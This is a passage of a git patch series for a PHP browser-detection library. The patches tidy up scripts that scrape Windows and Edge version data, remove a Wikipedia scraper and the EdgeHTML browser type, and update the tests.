self::writeWindowsVersions($windowsVersions); } else { @@ -67,13 +69,21 @@ private static function writeWindowsVersions($windowsVersions) private static function fetchCurrentVersion() { $content = file_get_contents('https://changewindows.org/filter/pc/all/current/month/true'); - if (!$content) throw new Exception(self::$errors['could_not_fetch_version']); + if (!$content) { + throw new Exception(self::$errors['could_not_fetch_version']); + } $content = explode('class="timeline"', $content, 2); - if (!isset($content[1])) throw new Exception(self::$errors['could_not_fetch_version']); + if (!isset($content[1])) { + throw new Exception(self::$errors['could_not_fetch_version']); + } $content = explode('build"', $content[1], 2); - if (!isset($content[1])) throw new Exception(self::$errors['could_not_fetch_version']); + if (!isset($content[1])) { + throw new Exception(self::$errors['could_not_fetch_version']); + } preg_match("/(\d*\.\d*)<\/div>/", $content[1], $matches); - if (!isset($matches[1])) throw new Exception(self::$errors['could_not_fetch_version']); + if (!isset($matches[1])) { + throw new Exception(self::$errors['could_not_fetch_version']); + } return $matches[1]; } @@ -122,15 +132,25 @@ private static function writeEdgeVersion($edgeHtml, $edge) private static function fetchSiblingVersions($content) { - if (!$content) throw new Exception(self::$errors['could_not_fetch_page']); + if (!$content) { + throw new Exception(self::$errors['could_not_fetch_page']); + } $content = explode('build-sidebar', $content, 2); - if (!isset($content[1])) throw new Exception(self::$errors['could_not_fetch_page']); + if (!isset($content[1])) { + throw new Exception(self::$errors['could_not_fetch_page']); + } $content = explode('fa-angle-left', $content[1]); - if (!isset($content[1])) throw new Exception(self::$errors['could_not_fetch_page']); + if (!isset($content[1])) { + throw new Exception(self::$errors['could_not_fetch_page']); + } $content = explode('fa-angle-right', $content[1]); - if (!isset($content[0])) throw new Exception(self::$errors['could_not_fetch_page']); + if (!isset($content[0])) { + throw new Exception(self::$errors['could_not_fetch_page']); + } preg_match_all("/> *(\d+) *1) - { - if (isset(self::$edgeHTML[$matches[1]])) - { + if (sizeof($matches)>1) { + if (isset(self::$edgeHTML[$matches[1]])) { self::$browser->setName(Browser::EDGE); self::$browser->setVersion(self::$edgeHTML[$matches[1]]); - } - else - { + } else { self::$browser->setName(Browser::EDGE_HTML); self::$browser->setVersion($matches[1]); } - } - else - { + } else { self::$browser->setName(Browser::EDGE); } From aa31357583f76538e406cc2f21beb0a0d6543b6d Mon Sep 17 00:00:00 2001 From: Gabriel Bull Date: Thu, 20 Apr 2017 11:26:27 -0400 Subject: [PATCH 18/19] Removed wikipedia crawling --- scripts/fetchEdgeVersions/Wikipedia.php | 77 ------------------------- scripts/fetchEdgeVersions/index.php | 3 - 2 files changed, 80 deletions(-) delete mode 100644 scripts/fetchEdgeVersions/Wikipedia.php diff --git a/scripts/fetchEdgeVersions/Wikipedia.php b/scripts/fetchEdgeVersions/Wikipedia.php deleted file mode 100644 index bd2bda1..0000000 --- a/scripts/fetchEdgeVersions/Wikipedia.php +++ /dev/null @@ -1,77 +0,0 @@ - 'Unable to fetch content', - 'parse_error' => 'Unable to parse content', - ); - - public static function fetch() - { - $content = file_get_contents(self::URL); - if (!$content) { - throw new Exception(self::$errors['fetch_error']); - } - $content = explode('===Release history===', $content); - if (!isset($content[1])) { - throw new Exception(self::$errors['parse_error']); - } - $table = explode('|-', $content[1]); - if (!isset($table[1])) { - throw new Exception(self::$errors['parse_error']); - } - $table = array_slice($table, 1); - $versions = array_map(array('Wikipedia', 'extractVersion'), $table); - self::writeEdgeVersions($versions); - } - - private static function extractVersion($content) - { - $lines = array_slice(array_filter( - explode(PHP_EOL, $content), - function ($val) { - return trim($val) && strpos($val, '|') === 0; - } - ), 0, 2); - - preg_match("/{[^}{]*Version[^}{]*\| ?([\d\.]+)}/", $lines[0], $edgeVersion); - preg_match("/\| *(\d*\.\d*)/", $lines[1], $edgeHtmlVersion); - - if (!isset($edgeVersion[1])) { - throw new Exception(self::$errors['parse_error']); - } - if (!isset($edgeHtmlVersion[1])) { - throw new Exception(self::$errors['parse_error']); - } - - return array($edgeHtmlVersion[1], $edgeVersion[1]); - } - - private static function writeEdgeVersions($versions) - { - $file = __DIR__ . '/../../src/edgeVersionMap.php'; - $currentVersions = require $file; - - foreach ($versions as $version) { - $currentVersions[$version[0]] = $version[1]; - } - ksort($currentVersions); - - $content = ''; - foreach ($currentVersions as $edgeHtml => $edge) { - $content .= " '{$edgeHtml}' => '{$edge}'," . PHP_EOL; - } - $data = << Date: Thu, 20 Apr 2017 11:41:45 -0400 Subject: [PATCH 19/19] Removed Edge HTML browser --- .../fetchEdgeVersions/windowsVersions.json | 6 +- src/Browser.php | 1 - src/BrowserDetector.php | 88 ++++--------------- .../Tests/_files/UserAgentStrings.xml | 4 +- .../Tests/_includes/UserAgentString.php | 18 ++-- 5 files changed, 32 insertions(+), 85 deletions(-) diff --git a/scripts/fetchEdgeVersions/windowsVersions.json b/scripts/fetchEdgeVersions/windowsVersions.json index f5710a1..f0f0865 100644 --- a/scripts/fetchEdgeVersions/windowsVersions.json +++ b/scripts/fetchEdgeVersions/windowsVersions.json @@ -25,5 +25,9 @@ "15061": true, "15062": true, "15063": true, - "16170": true + "15204": true, + "15205": true, + "16170": true, + "16176": true, + "16179": true } \ No newline at end of file diff --git a/src/Browser.php b/src/Browser.php index 0ba35ec..3ae4d23 100644 --- a/src/Browser.php +++ b/src/Browser.php @@ -38,7 +38,6 @@ class Browser const GSA = 'Google Search Appliance'; const YANDEX = 'Yandex'; const EDGE = 'Edge'; - const EDGE_HTML = 'EdgeHTML'; const DRAGON = 'Dragon'; const NSPLAYER = 'Windows Media Player'; const UCBROWSER = 'UC Browser'; diff --git a/src/BrowserDetector.php b/src/BrowserDetector.php index f16b61e..4b01f79 100644 --- a/src/BrowserDetector.php +++ b/src/BrowserDetector.php @@ -7,6 +7,7 @@ class BrowserDetector implements DetectorInterface const FUNC_PREFIX = 'checkBrowser'; protected static $userAgentString; + protected static $edgeVersionsMap = null; /** * @var Browser @@ -71,71 +72,14 @@ class BrowserDetector implements DetectorInterface 'Mozilla', /* Mozilla is such an open standard that you must check it last */ ); - //https://en.wikipedia.org/wiki/Microsoft_Edge - protected static $edgeHTML = [ - "12.10049" => "0.10.10049", - "12.10051" => "0.11.10051", - "12.10052" => "0.11.10052", - "12.10061" => "0.11.10061", - "12.10074" => "0.11.10074", - "12.1008" => "0.11.10080", - "12.10122" => "13.10122", - "12.1013" => "15.1013", - "12.10136" => "16.10136", - "12.10149" => "19.10149", - "12.10158" => "20.10158", - "12.10159" => "20.10159", - "12.10162" => "20.10162", - "12.10166" => "20.10166", - "12.1024" => "20.1024", - "12.10512" => "20.10512", - "12.10514" => "20.10514", - "12.10525" => "20.10525", - "12.10532" => "20.10532", - "12.10536" => "20.10536", - "13.10547" => "21.10547", - "13.10549" => "21.10549", - "13.10565" => "23.10565", - "13.10572" => "25.10572", - "13.10576" => "25.10576", - "13.10581" => "25.10581", - "13.10586" => "25.10586", - "13.11082" => "25.11082", - "13.11099" => "27.11099", - "13.11102" => "28.11102", - "13.14251" => "28.14251", - "13.14257" => "28.14257", - "14.14267" => "31.14267", - "14.14271" => "31.14271", - "14.14279" => "31.14279", - "14.14283" => "31.14283", - "14.14291" => "34.14291", - "14.14295" => "34.14295", - "14.143" => "34.143", - "14.14316" => "37.14316", - "14.14322" => "37.14322", - "14.14327" => "37.14327", - "14.14328" => "37.14328", - "14.14332" => "37.14332", - "14.14342" => "38.14342", - "14.14352" => "38.14352", - "14.14393" => "38.14393", - "14.14901" => "39.14901", - "14.14905" => "39.14905", - "14.14915" => "39.14915", - "14.14926" => "39.14926", - "14.14931" => "39.14931", - "14.14936" => "39.14936", - "15.14942" => "39.14942", - "15.14946" => "39.14946", - "15.14951" => "39.14951", - "15.14955" => "39.14955", - "15.14959" => "39.14959", - "15.14965" => "39.14965", - "15.14971" => "39.14971", - "15.14977" => "39.14977", - "15.14986" => "39.14986" - ]; + /** + * @return array + */ + public static function getEdgeVersionsMap() + { + if (self::$edgeVersionsMap) return self::$edgeVersionsMap; + return self::$edgeVersionsMap = require __DIR__ . '/edgeVersionMap.php'; + } /** * Routine to determine the browser type. @@ -537,17 +481,15 @@ public static function checkBrowserVivaldi() public static function checkBrowserEdge() { if (stripos(self::$userAgentString, 'Edge') !== false) { + self::$browser->setName(Browser::EDGE); preg_match('/Edge[\\/ \\(]([a-zA-Z\\d\\.]*)/i', self::$userAgentString, $matches); if (sizeof($matches)>1) { - if (isset(self::$edgeHTML[$matches[1]])) { - self::$browser->setName(Browser::EDGE); - self::$browser->setVersion(self::$edgeHTML[$matches[1]]); - } else { - self::$browser->setName(Browser::EDGE_HTML); - self::$browser->setVersion($matches[1]); + // todo: implement edge html version + $edgeVersionsMap = self::getEdgeVersionsMap(); + // todo: match versions in between + if (isset($edgeVersionsMap[$matches[1]])) { + self::$browser->setVersion($edgeVersionsMap[$matches[1]]); } - } else { - self::$browser->setName(Browser::EDGE); } return true; diff --git a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml index a342b23..d0b2d77 100644 --- a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml +++ b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml @@ -284,8 +284,8 @@ - EdgeHTML - 12.00049 + Edge + unknown Windows Phone 10 Lumia 640 LTE diff --git a/tests/BrowserDetector/Tests/_includes/UserAgentString.php b/tests/BrowserDetector/Tests/_includes/UserAgentString.php index 4bdcfc3..90e898d 100644 --- a/tests/BrowserDetector/Tests/_includes/UserAgentString.php +++ b/tests/BrowserDetector/Tests/_includes/UserAgentString.php @@ -4,35 +4,37 @@ class UserAgentString { + const UNKNOWN = 'unknown'; + /** * @var string */ - private $browser; + private $browser = self::UNKNOWN; /** * @var string */ - private $browserVersion; + private $browserVersion = self::UNKNOWN; /** * @var string */ - private $os; + private $os = self::UNKNOWN; /** * @var string */ - private $osVersion; + private $osVersion = self::UNKNOWN; /** * @var string */ - private $device; + private $device = self::UNKNOWN; /** * @var string */ - private $deviceVersion; + private $deviceVersion = self::UNKNOWN; /** * @var string @@ -42,12 +44,12 @@ class UserAgentString /** * @var string */ - private $scriptedAgent; + private $scriptedAgent = self::UNKNOWN; /** * @var string */ - private $scriptedAgentType; + private $scriptedAgentType = self::UNKNOWN; /** * @return string